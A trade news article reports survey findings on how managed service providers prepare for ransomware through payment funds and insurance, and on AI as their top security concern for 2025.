• Ransomware victims are getting better at haggling with hackers

Nearly half (45%) of MSPs maintain a dedicated pool of money for paying ransomware demands, according to new research from Cybersmart.

Conducted in collaboration with OnePoll, the firm’s annual MSP Survey report dives into the security of MSPs and their customers, detailing responses from 900 MSPs located across the UK, Europe, Australia, and New Zealand.

The study revealed that many MSPs would rather prepare for the worst-case scenario of paying a ransom than follow the advice of insurers and global governments to focus on proactive prevention.

Guidance and best practice around ransomware payments has typically been inadequately defined across the industry. Earlier this year, the UK Government proposed a targeted ban on ransomware payments for public sector bodies and critical national infrastructure (CNI) in a bid to make things clearer.

Despite this, Cybersmart’s findings show that MSPs are suffering from the effects of a lack of clarity across the board, with uncertainty also likely to filter down to their SME clients and into the wider ecosystem.

While 45% rely on a ransomware fund in their battle against ransomware, 36% of respondents said they choose to protect themselves through cyber insurance.

Perhaps most concerningly, however, is that a staggering 11% of participants admitted to having no ransomware-focused budget or cyber insurance at all, drastically increasing the likelihood of critical financial and reputational consequences.

Concerns

As AI continues to expand its influence across industries at breakneck speed, the survey found the technology to be the number one concern for MSPs for 2025 (44%), with ransomware and malware in second place (40%).

That’s in stark contrast to last year’s iteration of the report, with AI nowhere to be found on its list of top concerns.

Attackers are now increasingly leveraging AI advancements to generate phishing emails, produce convincing deepfakes, as well as create advanced malware in order to dupe organizations.

In fact, 2024 saw 67% of MSPs report an AI-based attack, with Cybersmart reasoning that 2025 will likely see this figure increase as attackers continue to leverage the latest generative AI, agentic AI, and deepfake technology.

This challenge is compounded by a lack of easy-to-use tools for MSPs to counter attacks, leaving SME clients vulnerable at a time when many are looking for increased support against AI.

According to the data, 84% of MSP participants said their customers now expect them to manage either their cyber security infrastructure, or their cyber security and IT estate combined.

“With customers relying more on MSPs for cybersecurity, it is essential that MSPs are cyber secure and cyber confident themselves, which means tackling the evolving threat landscape head-on,” explained Jamie Akhtar, Cybersmart’s CEO and co-founder.

“Organizations shouldn’t rely on ransomware payments; rather, they should partner with organizations that can help proactively secure them.”

MORE FROM CHANNELPRO

• The Channel Recruiter and Nebula debut new global talent resourcing solution
• Snowflake names Chris Niederman as new channel chief
• Okta and Palo Alto Networks are teaming up to ‘fight AI with AI’